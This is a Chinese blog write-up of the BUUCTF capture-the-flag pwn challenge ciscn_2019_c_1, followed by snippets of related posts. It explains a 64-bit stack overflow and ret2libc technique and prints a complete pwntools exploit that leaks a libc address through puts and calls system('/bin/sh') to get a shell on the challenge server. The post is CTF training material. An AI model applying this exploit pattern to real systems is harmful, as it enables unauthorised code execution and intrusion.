buuctf ciscn_2019_c_1 wp

最新推荐文章于 2024-04-08 00:15:36 发布
最新推荐文章于 2024-04-08 00:15:36 发布
阅读量609 收藏 4
点赞数 1
分类专栏: 网络攻防 文章标签: c语言 开发语言 后端 pwn linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yajuanpi4899/article/details/122519694
版权

目录

一、题目速阅

二、知识要点

三、题解payload

一、题目速阅

拿到题目,进行check

└─$ checksec ciscn_2019_c_1                                                                                         1 ⚙
[*] '/home/kali/Desktop/prac/ciscn_2019_c_1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

得到信息,64IDA进行反编译:

主函数中没有什么特别的东西, 进入begin:

进入1选项,即encrypt函数:

 

在这里可以看到s中有++x,有栈溢出,根据此构建payload。

二、知识要点

64位程序函数传参方式:

函数值寄存在rdi,rsi,rdx,rcx,r8,r9,进行带参数函数时依次将函数传递到寄存器内再进行函数运行,而32函数是直接在栈中取,构建payload示意图:

 

首先应将s空间进行泄露,0x50+覆盖rdp的值,即 0x50+8 的数据量进行第一层覆盖

再利用pop_rdi;ret语句进行将下一层值推入寄存器rdi中作为参数,本次payload构建目的在于利用puts函数泄露本身的真实地址,从而获取Libc基址,所以将puts_got作为参数,运行函数地址为puts_plt,即用puts来打印出Puts_got的地址,最后再返回start函数重新运行,在后续中再次利用libc的基址找出system以及“bin/sh”的地址,从而构建第二次payload,要注意的是由于靶机是Ubuntu,所以要构建栈平衡,第二次payload需要加入ret。

pop_rdi;ret地址获取语句:

ROPgadget --binary ciscn_2019_c_1 | grep "pop rdi ; ret"

 ret地址获取语句:

 ROPgadget --binary ciscn_2019_c_1 | grep "ret"

三、题解payload

from pwn import *
from LibcSearcher import  *

sh = remote('node4.buuoj.cn',25927)
elf=ELF('./ciscn_2019_c_1')
ocontent = 0
context(os='linux', arch='amd64', log_level='debug') #Debug log 
rdi_addr = 0x400c83 

start_addr = elf.sym['main']
put_plt = elf.plt['puts']
put_got = elf.got['puts']

sh.sendlineafter('ice!\n','1')
payload1 = cyclic(0x50+8)+p64(rdi_addr) +p64(put_got) +p64(put_plt) +p64(start_addr)
sh.sendline(payload1)
sh.recvuntil("Ciphertext\n")
sh.recvuntil("\n")
puts_addr=u64(sh.recvuntil('\n',drop=True).ljust(8,b'\x00'))

libc = LibcSearcher("puts",puts_addr)
libcbase = puts_addr - libc.dump("puts")
system_addr = libcbase + libc.dump("system")

bin_sh_addr  = libcbase + libc.dump("str_bin_sh")

sh.sendlineafter('ice!\n','1')
ret_addr=0x4006b9 #stack balance

payload2 = cyclic(0x50+8)+p64(ret_addr)+p64(rdi_addr)+p64(bin_sh_addr) + p64(system_addr)

sh.sendline(payload2)

sh.interactive()

胡胡同志要加油
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ciscn_2019_c_1 1
qq_41560595的博客
10-06 4402
payload构造 此题和之前总结的ret2libc题型相似,但是那个题是32位的,而此题是64位的。因此,payload的构造方式不一样。 payload1 此时的esp正处于函数返回的状态,即从上往下走。 在64位中,有rdi,rsi,rdx,rcx,r8,r9几个寄存器保存参数。当esp指向pop rdi ;ret时,rip指向puts_got,puts_got所保存的真实地址就能弹到rdi上。以上是准备参数。 再往下就是是固定格式“函数地址+返回地址+参数”的体现: 利用puts_plt作为函数地
BUUCTF_WriteUp 2021-08-23
m0_56897090的博客
08-23 371
2021-08-23 文章目录2021-08-23shell_asm题目描述题目分析BabyROP题目描述解题思路0x01 整体思路0x02 额外前置知识:0x03 expnot_the_same_3dsctf_20160x01 解题思路0x02 expBJDCTF-babystack0x01 解题思路0x02 Expjarvisoj_level20x01 整体分析0x02 exp32位0x03 64位解法get_started_3dsctf_20160x01 程序整体分析预期解法解法2:mprotectc
BUUCTF ciscn_2019_c_1
红叶的博客
10-30 790
RELRO 是一种用于加强对 Binary 数据段的保护的技术。由 CPU 提供支持,在页表中有Non-executable flag, 来限制一块内存区域不可执行。IDA Pro中查看的大小有时候可能是错误的,大部分时间以gdb动态调试为准。把加密后的文本复制到新建文本文档中,查询RBP的前4个字符。远程调试使用 libc 0 ,本地调试使用 libc 1。64位ELF,开启了部分RELRO以及NX。32位和64位程序在函数调用的方式存在区别。不止这种方法可以获取大小,还有两种方法。84 - 4 即可。
BUUCTF-PWNciscn_2019_c_1
qcwwww的博客
05-07 435
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 checksec一下 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除
BUUCTF-模板注入专项刷题
m0_51563147的博客
02-27 3411
SSTI: 目录 简单 [CSCCTF 2019 Qual]FlaskLight 签到 [BJDCTF2020]Cookie is so stable twig模板注入 [WesternCTF2018]shrine 想方设法获取config [CISCN2019 华东南赛区]Web11 smarty模板注入 [BJDCTF2020]The mystery of ip [GYCTF2020]FlaskApp debug模式一定条件下可以窃取出来pin码命令执行,但是题目过滤的不够严格导致.
2021第十四届全国大学生信息安全竞赛WPCISCN)-- pwn部分
热门推荐
lifanxin的博客
05-17 1万+
CISCN_2021_WP概述ciscn_2021_lonelywolf总结 概述   作为学习不到一年的练习生,今年第一次参加国赛,本以为题目会比较温柔,但是最后只做出了一道pwn题,本来还有两道pwn题是有机会的,但还是缺少一些知识或者技巧吧,没做出来,然后就结束了。本次国赛pwn题出了一道arm 64位结构的,其余都是正常的linuxpwn题,使用libc-2.27.so,有一道考了沙箱机制。 ciscn_2021_lonelywolf   ciscn_2021_lonelywolf   libc-
BUUCTF PWN-堆题总结 2021-09-27
m0_56897090的博客
09-27 2057
文章目录整体分析-2021-09-27新角度TcacheUAFFile结构体HourseOfForceUnlink经验新角度ciscn_2019_final_5分析EXPTCACHEhitcon_2018_children_tcache分析EXPUAFwustctf2020_easyfast分析EXPACTF_2019_babyheap分析EXPgyctf_2020_some_thing_interesting分析EXPbjdctf_2020_YDSneedGrirlfrien分析EXPciscn_2019
buuctf-web部分wp(更新一下)
a3uRa的一个窝
02-17 3746
前言(撮合看看吧 因为直接复制的本地 所以图片就没法显示了 有什么不懂的地方可以给我留言哦~ 然后推荐一个公众号:lin先森 求关注) b站 [BJDCTF2020]Easy MD5 f12 Hint: select * from ‘admin’ where password=md5($pass,true) ffifdyop 弱类型绕过 数组绕过 [极客大挑战 2019]Http 修改头 [...
[BUUCTF]ciscn_2019_c_1
最新发布
Lucien_Carr的博客
04-08 1338
想办法通过encrypt函数的 get函数栈溢出获得其中一个函数的地址(本题选择puts),通过LibcSearcher得到该函数在对应libc中的偏移量。没有‘system’,‘bin/sh’等有用的字符串,函数列表里也没有system等后门函数。该程序中并没有system,bin/sh等有用的字符串,无法使用ret2text。也没有构造溢出的函数,但是有很多puts,很好后面ret2libc可以用。通过已经调用过的函数泄露它在程序中的地址,然后利用地址末尾的3个字节,在。没什么能构造溢出的函数。
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1326
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
buuctf pwn ciscn_2019_c_1
qq_58402603的博客
10-20 592
首先基本操作: 先对文件进行checksec和file查看 然后使用ida进行静态分析,找到main函数后按F5观察伪代码 发现是一个加密程序 然后按shift+F12进行字符串的查找,发现没有 /bin/sh字符串,因此我们只能利用libcsearch库中的system函数来完成此题,可以对puts函数进行地址泄露。 对主函数中调用的函数进行查看,可以发现encrypt函数中有gets()函数,可以在这里进行栈溢出攻击 双击s查看字符串s所分配的内存大小可以发现,一共占50...
[BUUCTF]PWN6——ciscn_2019_c_1
mcmuyanga的博客
08-25 7115
[BUUCTF]PWN6——ciscn_2019_c_1 题目网址:https://buuoj.cn/challenges#ciscn_2019_c_1 步骤: 例行检查,64位,开启了nx保护 nc一下,看看输入点的字符串,三个选项加密、解密、退出 用64位ida打开,先是shift+f12查看一下程序里的字符串 没有发现system函数和字符串“bin/sh”,先根据输入点的字符串查看一下主要函数 就像一开始说的程序的功能就是加密和解密,看伪代码可以知道,只有选1的时候才会调用encrypt()
ciscn_2019_c_1
怪味巧克力的博客
07-18 599
0x01 检查文件,64位 检查开启的保护情况 开启了NX保护 0x02 IDA静态分析 在主函数这里并没有常见的gets栈溢出,尝试再这里面的子函数找找,发现了encrypt函数,进去查看 发现这个变量x的自增是由空间大小限制的,猜测这里会出现栈溢出漏洞,写出exp尝试溢出 0x03 exp: from pwn import * from LibcSearcher import * content = 0 context(os='linux', arch='amd64', log_level='
[buuuctf]ciscn_2019_c_1
逆向萌新的博客
06-16 430
[buuuctf]ciscn_2019_c_1细致教程
ciscn_2019_c_1【BUUCTF
qq_41696518的博客
08-26 1179
ciscn_2019_c_1【BUUCTF
EEPROM_WP_Pin
07-27
EEPROM_WP_Pin是一个常见的术语,它通常用于描述电子设备中的一个引脚或接口。EEPROM代表可擦写可编程只读存储器(Electrically Erasable Programmable Read-Only Memory),WP代表写保护(Write Protect)。因此,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值